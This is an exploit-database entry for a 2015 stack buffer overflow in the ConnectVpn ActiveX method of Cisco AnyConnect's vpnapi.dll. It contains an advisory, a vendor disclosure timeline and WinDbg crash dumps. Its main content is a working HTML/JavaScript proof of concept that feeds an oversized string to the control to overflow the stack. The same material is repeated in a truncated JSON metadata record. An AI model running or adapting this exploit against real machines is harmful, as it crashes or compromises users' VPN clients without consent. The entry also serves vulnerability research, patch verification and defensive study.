ID 1337DAY-ID-23757 Type zdt Reporter LiquidWorm Modified 2015-06-16T00:00:00
Description
Cisco AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code.
<!--
Cisco AnyConnect Secure Mobility Client Remote Command Execution
Vendor: Cisco Systems, Inc.
Product web page: http://www.cisco.com
Affected version: 2.x
3.0
3.0.0A90
3.1.0472
3.1.05187
3.1.06073
3.1.06078
3.1.06079
3.1.07021
3.1.08009
4.0.00013
4.0.00048
4.0.00051
4.0.02052
4.0.00057
4.0.00061
4.1.00028
Fixed in: 3.1.09005
4.0.04006
4.1.02004
4.1.02011
Summary: Cisco AnyConnect Secure Mobility Solution empowers your
employees to work from anywhere, on corporate laptops as well as
personal mobile devices, regardless of physical location. It provides
the security necessary to help keep your organization’s data safe
and protected.
Desc: The AnyConnect Secure Mobility Client VPN API suffers from
a stack buffer overflow vulnerability when parsing large amount of
bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function
which resides in the vpnapi.dll library, resulting in memory corruption
and overflow of the stack. An attacker can gain access to the system
of the affected node and execute arbitrary code.
==========================================================================
(f48.10cc): Unknown exception - code 000006ba (first chance)
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
(f48.10cc): C++ EH exception - code e06d7363 (first chance)
(f48.10cc): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll -
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
0:000> g
(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
vpnapi!ConnectIfcData::setConfigCookie+0x9195:
748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000
0:000> d edi
088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:000> d edx
088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
<12308000 B
----
>512150-512154 B
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll -
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
RPCRT4!UuidCreate+0x835:
75440fc4 56 push esi
0:000> g
(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)
eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
RPCRT4!UuidCreate+0x835:
75440fc4 56 push esi
0:000> d eax
004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client
004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn
004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\C
004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp
004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call
004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg
004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne
004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent...
0:000> d
004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> d esp+1500
00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....
00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................
00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
==========================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Vendor status:
[25.03.2015] Vulnerability discovered.
[28.03.2015] Vendor contacted.
[29.03.2015] Vendor responds asking more details.
[13.04.2015] Sent details to the vendor.
[15.04.2015] Asked vendor for status update.
[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact.
[22.04.2015] Asked vendor for status update.
[28.04.2015] No reply from the vendor.
[04.05.2015] Asked vendor for status update.
[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.
[12.05.2015] Asked vendor for confirmation.
[13.05.2015] Vendor resolved the issue, not sure for the release date.
[14.05.2015] Asked vendor for approximate scheduled release date.
[15.05.2015] Vendor informs that the defect is public (CSCuu18805).
[19.05.2015] Asked vendor for release information.
[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.
[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue.
[13.06.2015] Public security advisory released.
Advisory ID: ZSL-2015-5246
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php
Vendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805
25.03.2015
-->
<!DOCTYPE html>
<html>
<head>
<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>
</head>
<body>
<button onclick="O_o()">Launch</button>
<object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object>
<script language="JavaScript">
function O_o() {
//targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll"
//prototype = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )"
//memberName = "ConnectVpn"
//progid = "VpnApiLib.VpnApi"
var netv = Array(255712).join("ZS");
var push = //~~~~~~~~~~~~~~~~~~~~~~~~//
/*(()()())*/
"ZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZ"+ "SZSZ" +"SZSZSZ"+
"SZSZSZ"+ "SZSZ" +"SZSZSZ"+
"SZSZS"+ "ZSZS" +"ZSZSZ"+
"SZSZS"+ "ZSZS" +"ZSZSZ"+
"SZSZS"+"ZSZSZ"+"SZSZS"+
"SZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+
"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
"ZSZSZSZ" +"SZSZSZSZSZSZ"+ "SZSZ"+
"SZSZSZS" +"ZSZSZSZSZSZSZS"+ "ZSZS"+
"ZSZSZSZ" +"SZSZSZSZSZSZSZ"+ "SZSZ"+
"SZSZSZSZ"+ "SZSZSZSZSZSZSZSZS"+ "ZSZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
"SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S"+
"S"+ "Z"+ "S"+ "Z"+ "S"+ "S";
var godeep = netv.concat(push);
cisco.ConnectVpn godeep
}
</script>
</body>
</html>
# 0day.today [2018-04-12] #
{"published": "2015-06-16T00:00:00", "id": "1337DAY-ID-23757", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:55:16", "bulletin": {"published": "2015-06-16T00:00:00", "id": "1337DAY-ID-23757", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 8.3, "modified": "2016-04-20T00:55:16", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "12e8897c81da17ce49dc1bd0a6a97767ed54a4151a9a049d71686d1974df0b8e", "description": "Cisco AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code.", "type": "zdt", "lastseen": "2016-04-20T00:55:16", "edition": 1, "title": "Cisco AnyConnect Secure Mobility 2.x, 3.x, 4.x - Client DoS PoC", "href": "http://0day.today/exploit/description/23757", "modified": "2015-06-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/23757", "references": [], "reporter": "LiquidWorm", "sourceData": "<!--\r\n \r\nCisco AnyConnect Secure Mobility Client Remote Command Execution\r\n \r\n \r\nVendor: Cisco Systems, Inc.\r\nProduct web page: http://www.cisco.com\r\nAffected version: 2.x\r\n 3.0\r\n 3.0.0A90\r\n 3.1.0472\r\n 3.1.05187\r\n 3.1.06073\r\n 3.1.06078\r\n 3.1.06079\r\n 3.1.07021\r\n 3.1.08009\r\n 4.0.00013\r\n 4.0.00048\r\n 4.0.00051\r\n 4.0.02052\r\n 4.0.00057\r\n 4.0.00061\r\n 4.1.00028\r\n \r\nFixed in: 3.1.09005\r\n 4.0.04006\r\n 4.1.02004\r\n 4.1.02011\r\n \r\nSummary: Cisco AnyConnect Secure Mobility Solution empowers your\r\nemployees to work from anywhere, on corporate laptops as well as\r\npersonal mobile devices, regardless of physical location. It provides\r\nthe security necessary to help keep your organization\u00e2\u20ac\u2122s data safe\r\nand protected.\r\n \r\nDesc: The AnyConnect Secure Mobility Client VPN API suffers from\r\na stack buffer overflow vulnerability when parsing large amount of\r\nbytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function\r\nwhich resides in the vpnapi.dll library, resulting in memory corruption\r\nand overflow of the stack. An attacker can gain access to the system\r\nof the affected node and execute arbitrary code.\r\n \r\n==========================================================================\r\n \r\n(f48.10cc): Unknown exception - code 000006ba (first chance)\r\n(f48.10cc): C++ EH exception - code e06d7363 (first chance)\r\n(f48.10cc): C++ EH exception - code e06d7363 (first chance)\r\n(f48.10cc): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll - \r\neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022\r\neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nvpnapi!ConnectIfcData::setConfigCookie+0x9195:\r\n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000\r\n0:000> g\r\n(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)\r\neax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022\r\neip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nvpnapi!ConnectIfcData::setConfigCookie+0x9195:\r\n748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000\r\n0:000> d edi\r\n088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n0:000> d edx\r\n088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n<12308000 B\r\n \r\n----\r\n \r\n>512150-512154 B\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\syswow64\\RPCRT4.dll - \r\neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738\r\neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nRPCRT4!UuidCreate+0x835:\r\n75440fc4 56 push esi\r\n0:000> g\r\n(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)\r\neax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738\r\neip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\r\nRPCRT4!UuidCreate+0x835:\r\n75440fc4 56 push esi\r\n0:000> d eax\r\n004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client\r\n004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn\r\n004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\\C\r\n004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp\r\n004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call\r\n004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg\r\n004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne\r\n004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent...\r\n0:000> d\r\n004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\r\n004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA\r\n004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n0:000> d esp+1500\r\n00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t....\r\n00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................\r\n00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n \r\n==========================================================================\r\n \r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nVendor status:\r\n \r\n[25.03.2015] Vulnerability discovered.\r\n[28.03.2015] Vendor contacted.\r\n[29.03.2015] Vendor responds asking more details.\r\n[13.04.2015] Sent details to the vendor.\r\n[15.04.2015] Asked vendor for status update.\r\n[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact.\r\n[22.04.2015] Asked vendor for status update.\r\n[28.04.2015] No reply from the vendor.\r\n[04.05.2015] Asked vendor for status update.\r\n[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.\r\n[12.05.2015] Asked vendor for confirmation.\r\n[13.05.2015] Vendor resolved the issue, not sure for the release date.\r\n[14.05.2015] Asked vendor for approximate scheduled release date.\r\n[15.05.2015] Vendor informs that the defect is public (CSCuu18805).\r\n[19.05.2015] Asked vendor for release information.\r\n[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.\r\n[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue.\r\n[13.06.2015] Public security advisory released.\r\n \r\n \r\nAdvisory ID: ZSL-2015-5246\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php\r\nVendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805\r\n \r\n \r\n25.03.2015\r\n \r\n-->\r\n \r\n \r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>\r\n</head>\r\n<body>\r\n<button onclick=\"O_o()\">Launch</button>\r\n<object id=\"cisco\" classid=\"clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}\"></object>\r\n<script language=\"JavaScript\">\r\n \r\nfunction O_o() {\r\n //targetFile = \"C:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnapi.dll\"\r\n //prototype = \"Sub ConnectVpn ( ByVal strHostNameOrAddress As String )\"\r\n //memberName = \"ConnectVpn\"\r\n //progid = \"VpnApiLib.VpnApi\"\r\n \r\n var netv = Array(255712).join(\"ZS\");\r\n var push = //~~~~~~~~~~~~~~~~~~~~~~~~//\r\n \r\n /*(()()())*/\r\n \"ZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZ\"+ \"SZSZ\" +\"SZSZSZ\"+\r\n \"SZSZSZ\"+ \"SZSZ\" +\"SZSZSZ\"+\r\n \"SZSZS\"+ \"ZSZS\" +\"ZSZSZ\"+\r\n \"SZSZS\"+ \"ZSZS\" +\"ZSZSZ\"+\r\n \"SZSZS\"+\"ZSZSZ\"+\"SZSZS\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ\"+\r\n \"SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS\"+\r\n \"ZSZSZSZ\" +\"SZSZSZSZSZSZ\"+ \"SZSZ\"+\r\n \"SZSZSZS\" +\"ZSZSZSZSZSZSZS\"+ \"ZSZS\"+\r\n \"ZSZSZSZ\" +\"SZSZSZSZSZSZSZ\"+ \"SZSZ\"+\r\n \"SZSZSZSZ\"+ \"SZSZSZSZSZSZSZSZS\"+ \"ZSZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\" +\"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZS\"+ \"ZSZ\"+ \"SZS\"+ \"ZSZ\"+ \"SZS\" +\"ZSZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"SZ\" +\"SZ\" +\"SZ\" +\"SZ\" +\"SZ\"+ \"SZ\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"Z\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\"+\r\n \"S\"+ \"Z\"+ \"S\"+ \"Z\"+ \"S\"+ \"S\";\r\n \r\n \r\n var godeep = netv.concat(push);\r\n cisco.ConnectVpn godeep\r\n}\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "01408973d70250864c39c42ff0344a75", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e1113bc36df79b2f7b429dd6a8c02699", "key": "sourceHref"}, {"hash": "6294dd6c1fbdf227e831168c829925c4", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5be39c0e5ca0e4098c5ff16d63e248fe", "key": "modified"}, {"hash": "5be39c0e5ca0e4098c5ff16d63e248fe", "key": 